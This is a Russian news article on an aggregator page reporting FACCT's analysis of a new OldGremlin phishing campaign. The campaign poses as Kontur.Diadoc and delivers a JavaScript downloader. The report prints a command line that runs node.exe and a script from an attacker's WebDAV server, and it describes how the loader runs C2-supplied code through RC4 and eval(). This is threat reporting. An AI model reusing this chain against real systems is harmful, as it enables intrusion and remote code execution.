Хак-группа OldGremlin возобновила свою активность - «Новости» » Интернет технологии
sitename
Asgard представила память DDR5 CUDIMM со стабильным разгоном до 9600 МТ/с - «Новости сети»
Asgard представила память DDR5 CUDIMM со стабильным разгоном до 9600 МТ/с - «Новости сети»
Lexar представила карту памяти SD 8.0, которая оказалась слишком быстрой для современных устройств - «Новости сети»
Lexar представила карту памяти SD 8.0, которая оказалась слишком быстрой для современных устройств - «Новости сети»
AMD упустила миллиарды долларов: производители ноутбуков жалуются на недопоставки чипов Strix Point - «Новости сети»
AMD упустила миллиарды долларов: производители ноутбуков жалуются на недопоставки чипов Strix Point - «Новости сети»
SpaceX благополучно приземлила космических туристов миссии Polaris Dawn у побережья Флориды - «Новости сети»
SpaceX благополучно приземлила космических туристов миссии Polaris Dawn у побережья Флориды - «Новости сети»
Энтузиаст разогнал неразгоняемый процессор AMD EPYC 4124P до 6,6 ГГц - «Новости сети»
Энтузиаст разогнал неразгоняемый процессор AMD EPYC 4124P до 6,6 ГГц - «Новости сети»
Хакер украл и опубликовал 440 ГБ данных компании Fortinet - «Новости»
Хакер украл и опубликовал 440 ГБ данных компании Fortinet - «Новости»
Фишеры массово атакуют российские отели - «Новости»
Фишеры массово атакуют российские отели - «Новости»
GitLab патчит критическую уязвимость, связанную с пайплайном - «Новости»
GitLab патчит критическую уязвимость, связанную с пайплайном - «Новости»
Арестован подросток, связанный со взломом муниципальной службы Transport for London - «Новости»
Арестован подросток, связанный со взломом муниципальной службы Transport for London - «Новости»
Группа Lazarus атакует Python-разработчиков с помощью фейковых тестовых заданий - «Новости»
Группа Lazarus атакует Python-разработчиков с помощью фейковых тестовых заданий - «Новости»
Как заработать денег, не выходя из дома, мы вам поможем с этим разобраться » Новости » Хак-группа OldGremlin возобновила свою активность - «Новости»

Вымогательская группировка OldGremlin атаковала российские компании в 2020-2022 годах, и суммы требуемых выкупов исчислялись миллионами, а в 2022 году ценник поднялся до 1 миллиарда рублей. Теперь специалисты FACCT сообщили, что группа снова активна и использует новый инструмент OldGremlin.JsDownloader.


Недавно аналитики компании обнаружили загруженное на платформу AnyRun письмо, которое было отправлено от имени сотрудницы компании «Диадок» с использованием адреса электронной почты - Ольга Макарова . Получателем письма был сотрудник неназванной российской нефтехимической компании.





Письмо было отправлено 12 августа 2024 года и имело тему «Уведомление из Диадок: документы требуют вашего участия». Домен diadok[.]net, с которого было отправлено вредоносное письмо, имитировал оригинальный домен компании «Контур.Диадок» —diadoc[.]ru, что привлекло внимание исследователей, поскольку ранее мимикрия под «Диадок» уже встречалась в атаках OldGremlin.


Аналитики рассказывают, что письмо содержало ссылку (hxxps://diadok[.]net/1ealfus19t) для скачивания файла «счет-фактура.xlsx». После перехода по ссылке загружался архив Счет_фактура_от-09-09-2024[.]zip, содержащий LNK-файл «Счет_фактура_от-09-08-2024.xlsx.lnk». После запуска происходило подключение к WebDav-серверу (46[.]101[.]122[.]204) и на стороне клиента (жертвы) выполнялась команда: 46[.]101[.]122[.]204DavWWWRootode.exe 46[.]101[.]122[.]204DavWWWRootword.txt. Исследователи отмечают, что и WebDAV ранее так же встречался в атаках OldGremlin.


Загруженный файл node.exe является Node.js интерпретатором версии v0.10.48 и доступен для загрузки с официального сайта Node.js (hxxps://nodejs[.]org/) по ссылке hxxps://nodejs[.]org/dist/v0.10.48/node.exe. И в предыдущих атаках OldGremlin тоже использовали Node.js интерпретаторы.


В конечном итоге на машине жертвы, вместо запуска XLS-приманки и очередного дочернего процесса, происходит запуск jаvascript-сценария (OldGremlin.JsDownloader),  в задачи которого входит загрузка и выполнение произвольных jаvascript-сценариев.


Этот скрипт исполняется в виде анонимной функции. После того как она будет запущена, выполняется подключение к серверу 157[.]230[.]18[.]205:80, после чего на управляющий сервер отправляется случайно сгенерированный набор данных размером 32 байта. Полученным ответом будет подпись отправленного набора данных. Далее выполнится проверка полученной подписи с заданными параметрами публичного ключа.


Если проверка подписи прошла успешно, OldGremlin.JsDownloader будет ожидать данных от своего управляющего сервера. А когда вредоносный загрузчик получит данные от сервера, они будут расшифрованы и переданы в функцию eval(), которая позволяет выполнить произвольный jаvascript-код. Алгоритм шифрования данных — RC4, где ключом является хеш-сумма MD5, полученная от случайно сгенерированного набора байт, который был отправлен на сервер ранее.


Представители «Контур.Диадок» уже предупредили о происходящем пользователей своего сервиса, отправив им предупреждающие письма, а также подготовили официально заявление. Подчеркивается, что «Контур.Диадок» не был задействован в атаке или скомпрометирован, и злоумышленники используют бренд сервиса для рассылки малвари.


Вымогательская группировка OldGremlin атаковала российские компании в 2020-2022 годах, и суммы требуемых выкупов исчислялись миллионами, а в 2022 году ценник поднялся до 1 миллиарда рублей. Теперь специалисты FACCT сообщили, что группа снова активна и использует новый инструмент OldGremlin.JsDownloader. Недавно аналитики компании обнаружили загруженное на платформу AnyRun письмо, которое было отправлено от имени сотрудницы компании «Диадок» с использованием адреса электронной почты - Ольга Макарова . Получателем письма был сотрудник неназванной российской нефтехимической компании. Письмо было отправлено 12 августа 2024 года и имело тему «Уведомление из Диадок: документы требуют вашего участия». Домен diadok_
CSS
запостил(а)
Leman
Вернуться назад

Смотрите также


А что там на главной? )))



Комментарии )))



Комментарии для сайта Cackle
Войти через: